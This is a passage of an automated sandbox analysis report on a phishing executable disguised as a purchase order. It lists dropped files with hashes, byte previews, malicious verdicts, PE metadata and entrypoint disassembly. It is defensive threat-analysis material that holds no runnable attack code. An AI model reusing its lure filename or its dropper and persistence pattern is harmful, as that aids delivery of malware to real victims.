                                                                                                                        SHA-512:F279B695567203BE277AE105A636163EC2F41B900E94CD934FA26ABE19EA912D755C3F144DF4F4FC044639F2AC5CA10446A1793BF1EDFDC29A9577836C96F201
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:MDMP....... .......wP.c.........................................%..........T.......8...........T............................................................................................................U...........B......8.......GenuineIntelW...........T...........tP.c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1753.tmp.WERInternalMetadata.xml

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8316
                                                                                                                        Entropy (8bit):3.6971504734754745
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNi1h6+kGE76YBScSUvgmfYSSCprm89bPRsf6lm:RrlsNiz6+kGE76YBZSUvgmfYSlPKfx
                                                                                                                        MD5:0C2AA2BEACEC714648312E4758CC6398
                                                                                                                        SHA1:D0B12EB6E0D73080570C74BD6A89A128619D448E
                                                                                                                        SHA-256:8F1FBF663B7649EEC73BBA5BE84352F37F68EEB7D56824A84070722740305BDE
                                                                                                                        SHA-512:3B0E18674E59C84C89F875D8CE6E66F0A943EC0498DEA85B41FF28AEE60C620CBBF4E337333BC6E10F30F248878F4D8DE160C404F5228FBAD6D93F6CA0319A09
                                                                                                                        Malicious:false
                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.4.0.<./.P.i.d.>.......

                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1810.tmp.xml

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4577
                                                                                                                        Entropy (8bit):4.456911385463713
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsqrJgtWI9syWgc8sqYjG8fm8M4JhhYM7aFAO+q8AxF/ucnLGq3131d:uITfqFvTgrsqYXJhh9fOxxAcnLz3131d
                                                                                                                        MD5:787E667FEA93058BAABB354313A383EA
                                                                                                                        SHA1:EBE6B5FEF5282B1A9C48E51A4009C84BB7F60EBA
                                                                                                                        SHA-256:DA14B3F4C5FE0CAB3583006C73483CEB04A9ADE3558750569B8BBD30C0EB2DCA
                                                                                                                        SHA-512:033E73DCB8DDB5BA108A6D6693EA53E19F8B07D44BD7EEB5D504C0518B34C7F80AD5EB76A73E3D4F00F3CF23016F426F9BF0256B00E2668EEE546203968219C9
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1801664" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER206.tmp.WERInternalMetadata.xml

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8304
                                                                                                                        Entropy (8bit):3.699302336059976
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNi2c6enNL0xq6YBSLSUKgmfYSSCprJ89b5ksfY+zm:RrlsNit6ENL0xq6YBuSUKgmfYSc5XfYL
                                                                                                                        MD5:34D0C29EDEB9291888F5D1A50A014FEF
                                                                                                                        SHA1:B7821B75BDF77EB93EA9A6F46BD51D9D9A3415FE
                                                                                                                        SHA-256:A4A9F780CABA96FAF2230242D42E1DBD129EF0EA355A35805CC8F18D9B61900E
                                                                                                                        SHA-512:87A94E5F65571D28D1B4189AE52E5E82AC7C6C14967B2DDD098B5010745B57CAC979A3AA1AC3B041B0B87CF2F871F38568D6229D93378E43E7D042763CFC32E8
                                                                                                                        Malicious:false
                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.0.4.0.<./.P.i.d.>.......

                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A3.tmp.xml

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4577
                                                                                                                        Entropy (8bit):4.457629089404613
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsqrJgtWI9syWgc8sqYj18fm8M4JhhYM7aFz2+q8AxF/5LGq3139d:uITfqFvTgrsqYGJhh9A2xxLLz3139d
                                                                                                                        MD5:62377028B54AEE8D136411AB5EABFB35
                                                                                                                        SHA1:4CA2C3D9E7E1DE5292BFCB850BF09CD0E785DD0C
                                                                                                                        SHA-256:5E5B155E3AE0838AD92071C53510DF5BC0F8169EE6224BC2BB757C7D67858150
                                                                                                                        SHA-512:DB093BCC43A7707163F531332DE4AEFAE40A992EE1D4041499318DAD730A8A9FA6422AFDE03F2E2CEC764EC6DD5AB3CD804BFC22A0EDEA4F8C1588793A132186
                                                                                                                        Malicious:false
                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1801664" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF75.tmp.dmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Tue Nov 29 18:33:21 2022, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):40132
                                                                                                                        Entropy (8bit):2.0040008468253996
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:zbmX3FvVpOc5NcFNwpPsf1TFC9GrEBopK:+licrcFNyPs9TjK
                                                                                                                        MD5:106AFACC119E90AC953EEABE57CEA3B4
                                                                                                                        SHA1:A6ABBED87500BFE854024C5341771C65692FD7FD
                                                                                                                        SHA-256:38475C67FD546492D1F7D6D3350CD6F329A101B380E26B2FEC0ED5D67253751B
                                                                                                                        SHA-512:3071D8D628D6CC3E0AD05BFD4F1CE80A235CF444CD4966B52E3173C31DC0220150A947B74FF027C879735F865C8D7ABE202F91194415ADBB2E504F94FDFE94FA
                                                                                                                        Malicious:false
                                                                                                                        Preview:MDMP....... .......qP.c........................................p&..........T.......8...........T........... ............... ................................................................................U...........B..............GenuineIntelW...........T...........kP.c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\456b6ELMQ

                                                                                                                        Download File
                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):94208
                                                                                                                        Entropy (8bit):1.287139506398081
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                                                                        MD5:292F98D765C8712910776C89ADDE2311
                                                                                                                        SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                                                                        SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                                                                        SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                                                                        Malicious:false
                                                                                                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\eojsm.wx

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):189440
                                                                                                                        Entropy (8bit):7.998554091662563
                                                                                                                        Encrypted:true
                                                                                                                        SSDEEP:3072:SWMXxgX4d9iRFy0ALl5gXs0CQ1/zhvFpalFNTTzVhqOD/AKuhoTQnnEftVzJJ1IA:RMGFKLl5As+zhGXlYAuhXnnEjFic
                                                                                                                        MD5:8C5E7C152ED8F18A0B9DE322E94A3CE2
                                                                                                                        SHA1:35C05FA705DC9E6C1998F53F248E0332BC4FB0E2
                                                                                                                        SHA-256:B0950EC5415DCFC9BF3394770C2071FAD57B1A02E28416E5E41C3B13266A720A
                                                                                                                        SHA-512:0A42DAC7F56CF6B765A52F230C3F1539940F0D507D8CE1C928D89D12BF675F3C41B7B9D9FA10A693ECE96A281DBD8E83D481D310F5CA57812FB979DF34A69CA2
                                                                                                                        Malicious:false
                                                                                                                        Preview:..{;*_....].3.P NZ.l.3...y.GJs'.j.S+.<ERq.?...$...C.... v....W......=D@.g..K..s...J......D..Y.].vM...HG..../.....2F.%R..~...c.4.!.Y+..oj......3q6.40...&...P..>Zb=d.A+.a... .w"b}...VAzL.uDJ..Q.3.i....x..7|.a..N*..Km..A..7%.(.[....;Ph.....O.....R.GO.@.V_..:){}d_.....lk.....O..:.'..SD.<ER..?Y..$...x.... v.(...T...2K.e9..u..oo.....2J......`.u\.>.t+s..r..2....4fD..3R..~.......<....N...uM#..L=.{. ....!.......7...V.}#.. .w"b}....C.L.uOG<.r..3...x..7|...c..8.K$.....7%.(.......Ph....O......G..@.V_...){}d_.....lkc....O..Js'.j.S+.<ERq.?...$...C.... v.(...T...2K.e9..u..oo.....2J......`.u\.>.t+s..r..2....4fD..3R..~.......<....N...uM#..L=.{. ....!.......7...V.}#.. .w"b}...VAzL.uaz.r..3.sK...x..7|...c..8.Km..A..7%.(.......Ph....O......G..@.V_...){}d_.....lkc....O..Js'.j.S+.<ERq.?...$...C.... v.(...T...2K.e9..u..oo.....2J......`.u\.>.t+s..r..2....4fD..3R..~.......<....N...uM#..L=.{. ....!.......7...V.}#.. .w"b}...VAzL.uaz.r..3.sK...x..7|...c..8.Km..A..7%.(.

                                                                                                                        C:\Users\user\AppData\Local\Temp\jaxdij.exe

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):147968
                                                                                                                        Entropy (8bit):6.182679953719657
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:jOPPLcLP9kkaQ+nBwmbePxRC/fkBYcgcg7JkWmjwaY4Y4O1JXy:jiLcLP9c/8BZgFLm8FLC
                                                                                                                        MD5:2DD6C8B13AE7D028B0047435FF0DCB8A
                                                                                                                        SHA1:D50BC8834758E1583AEE729B6C148E4849967097
                                                                                                                        SHA-256:01CB657E996E468706F5C733853419678B8294E7F12669C98DB23C1F0D0EFC7A
                                                                                                                        SHA-512:B6438EAFA008519CD2113FD113192F2F9F5F05AD5EFBEB08542C800B7E3BD0E7D3DDE83EBBA8A2374E2DF62FED6CC1248B41CE8CEA41BEE256DA8A0B25FCAF2C
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......c............................l.............@.......................................@.........................................................................................................`...................|............................text............................... ..`.rdata..$t.......v..................@..@.data....%...@......................@....00cfg.......p.......&..............@..@.voltbl."............(...................rsrc................*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\nsqB9A3.tmp

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe
                                                                                                                        File Type:COM executable for DOS
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):353762
                                                                                                                        Entropy (8bit):7.44582442154262
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:dTMGFKLl5As+zhGXlYAuhXnnEjFiREKiLcLP9c/8BZgFLm8FLC:dMGgL3As+gSAu8FuEKiLcLPKcWC8c
                                                                                                                        MD5:6B34F2B63558A2CC41B3CB5AF526EC23
                                                                                                                        SHA1:8877B4A75BD7DD4DE02CC16643E2AA2E0C193D78
                                                                                                                        SHA-256:9C8ACF6A541EE2C83930C4CF4D0E682AE8FFDAF4FCC9FDC244ACCF37416F75A8
                                                                                                                        SHA-512:B42DEE735681A9A552F5840AF130D483A5BA2E7FBC6233D5747DA45706166F463E6A49979A0D99B8E4B3B7D6E4C729F43735CF8C1A108FC0C5C8D73B0DFC6EBD
                                                                                                                        Malicious:true
                                                                                                                        Preview:.!......,...................h...T........ .......!..........................................................................................................................................................................................................................................J...............r...j...............................................................................................................................r.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        C:\Users\user\AppData\Local\Temp\uqnwrddys.k

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):7706
                                                                                                                        Entropy (8bit):6.249721264956451
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:xgj/PNnh4pnxYvcIrL+S3yfMae9h4OLzHUphGmKN33w2:xgjnI1xYvReS3yctzHIpKN1
                                                                                                                        MD5:A342BD922F1907E57D17E98F522B64EF
                                                                                                                        SHA1:934596A7680633634741A445C5D9E0BDCF9C3D8F
                                                                                                                        SHA-256:1C1AD949B639CDD656A62B398660A1CCEE4A7FC40E1912BF1A5BBAB78E51B176
                                                                                                                        SHA-512:6527A40317BC37D0E7274A3880A652E9BD0EE4E874DEF4478493D93BEE7DB4564CAFEC1574E8605945758963945AADC1D3219410CB877E0C331CECA6671A06AE
                                                                                                                        Malicious:false
                                                                                                                        Preview:.....(s............|I...(s............7....z...gT.....7..T.....56/J.......7.R......BC.S...L.E.C.V..Jg.7.56/J......(s............|,........gT......"..D.<.T.'.KI.TKI....'....gT....g:.~....g....D.........7.56/J.....................M.......=.....|.E......'.gT.{..Z.M....'..z....7....T561KJ...'..].$....M.........(s............|,.s>..7.......<../..9.7....9.7"......9gT.1.'..M.'..]x.]..J"{....U.T.]..J2..B..U"{.....6.]D..F.I..D..=7...../..M......./....<.'.._.T...T.561KJ.......7.R......BC.S......L.E.C.]..Jg.7.56/J.........."..",..'@.." ."...'F."3..':."$..'8."+..'>."...'<...'."(...'..T./....D..........'........,.i>......,..P...@.D....,..........,..O...'....,..X...'..~...,.....'......,......'......,..>...'.......7..'..>..........,...."..".,.....7........."......g..5".,...ES......'.gT.........gT.....,...."..".,....7.......'...7....gT.......I...T561KJ..............".."...g...."...g....."...g.....".."...g....."...g2...."'..g0...."

                                                                                                                        C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe

                                                                                                                        Download File
                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\jaxdij.exe
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):147968
                                                                                                                        Entropy (8bit):6.182679953719657
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:jOPPLcLP9kkaQ+nBwmbePxRC/fkBYcgcg7JkWmjwaY4Y4O1JXy:jiLcLP9c/8BZgFLm8FLC
                                                                                                                        MD5:2DD6C8B13AE7D028B0047435FF0DCB8A
                                                                                                                        SHA1:D50BC8834758E1583AEE729B6C148E4849967097
                                                                                                                        SHA-256:01CB657E996E468706F5C733853419678B8294E7F12669C98DB23C1F0D0EFC7A
                                                                                                                        SHA-512:B6438EAFA008519CD2113FD113192F2F9F5F05AD5EFBEB08542C800B7E3BD0E7D3DDE83EBBA8A2374E2DF62FED6CC1248B41CE8CEA41BEE256DA8A0B25FCAF2C
                                                                                                                        Malicious:true
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......c............................l.............@.......................................@.........................................................................................................`...................|............................text............................... ..`.rdata..$t.......v..................@..@.data....%...@......................@....00cfg.......p.......&..............@..@.voltbl."............(...................rsrc................*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                        Entropy (8bit):7.365597808064567
                                                                                                                        TrID:
                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:New PO-RJ-IN-003 - Knauf Queimados.exe
                                                                                                                        File size:405670
                                                                                                                        MD5:244fc9610f75225aa3dc09958195beb1
                                                                                                                        SHA1:ef0d6103d27090fc9d25e3ef3de2e1b6d9670d9c
                                                                                                                        SHA256:05cdda3567b913d99627f8e41336404d5830816df65e1001d6b2ad05bd9ed18d
                                                                                                                        SHA512:5e37d34becf476a92c2b14917819c9f9366d99313e971554b4a94d4fe09e05a761355033b5bb59faf3d0a1e34621c31891ff4e5656a379aa581792a7ecc82f16
                                                                                                                        SSDEEP:6144:hBn7A5jMUCoQUg+p1vrgTr+H9I/LKUsBdVyXMLCMT5u9AG7Nmf:vrZ+1v0TSdcLKj0MLtlu9VNG
                                                                                                                        TLSH:9284CFA3F245989ED44202B3846EED342612ADAAA435DD1673E6BC3F79F31831463F17
                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3(..RF..RF..RF.*]...RF..RG.pRF.*]...RF..qv..RF..T@..RF.Rich.RF.........................PE..L...ly.V.................^.........

                                                                                                                        File Icon

                                                                                                                        Icon Hash:b4b0c6c6c4dedca3

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x40324f
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x400000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                        DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                        Time Stamp:0x567F796C [Sun Dec 27 05:38:52 2015 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:4
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:4
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:4
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:ab6770b0a8635b9d92a5838920cfe770

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        sub esp, 00000180h
                                                                                                                        push ebx
                                                                                                                        push ebp
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        xor ebx, ebx
                                                                                                                        push 00008001h
                                                                                                                        mov dword ptr [esp+1Ch], ebx
                                                                                                                        mov dword ptr [esp+14h], 00409130h
                                                                                                                        xor esi, esi
                                                                                                                        mov byte ptr [esp+18h], 00000020h
                                                                                                                        call dword ptr [004070B8h]
                                                                                                                        call dword ptr [004070B4h]
                                                                                                                        cmp ax, 00000006h
                                                                                                                        je 00007F6FC0C9C953h
                                                                                                                        push ebx
                                                                                                                        call 00007F6FC0C9F741h
                                                                                                                        cmp eax, ebx
                                                                                                                        je 00007F6FC0C9C949h
                                                                                                                        push 00000C00h
                                                                                                                        call eax
                                                                                                                        push 004091E0h
                                                                                                                        call 00007F6FC0C9F6C2h
                                                                                                                        push 004091D8h
                                                                                                                        call 00007F6FC0C9F6B8h
                                                                                                                        push 004091CCh
                                                                                                                        call 00007F6FC0C9F6AEh
                                                                                                                        push 0000000Dh
                                                                                                                        call 00007F6FC0C9F711h
                                                                                                                        push 0000000Bh
                                                                                                                        call 00007F6FC0C9F70Ah
                                                                                                                        mov dword ptr [00423F84h], eax
                                                                                                                        call dword ptr [00407034h]
                                                                                                                        push ebx
                                                                                                                        call dword ptr [00407270h]
                                                                                                                        mov dword ptr [00424038h], eax
                                                                                                                        push ebx
                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                        push 00000160h
                                                                                                                        push eax
                                                                                                                        push ebx
                                                                                                                        push 0041F538h
                                                                                                                        call dword ptr [00407160h]
                                                                                                                        push 004091C0h
                                                                                                                        push 00423780h
                                                                                                                        call 00007F6FC0C9F341h
                                                                                                                        call dword ptr [004070B0h]
                                                                                                                        mov ebp, 0042A000h
                                                                                                                        push eax
                                                                                                                        push ebp
                                                                                                                        call 00007F6FC0C9F32Fh
                                                                                                                        push ebx
                                                                                                                        call dword ptr [00407144h]

                                                                                                                        Rich Headers

                                                                                                                        Programming Language:
                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x73cc0xa0.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x1d8a8.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x5c4a0x5e00False0.659906914893617data6.410763775060762IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x70000x115e0x1200False0.4466145833333333data5.142548180775325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0x90000x1b0780x600False0.455078125data4.2252195571372315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .rsrc0x2d0000x1d8a80x1da00False0.27741791930379744data4.920016096491695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountry
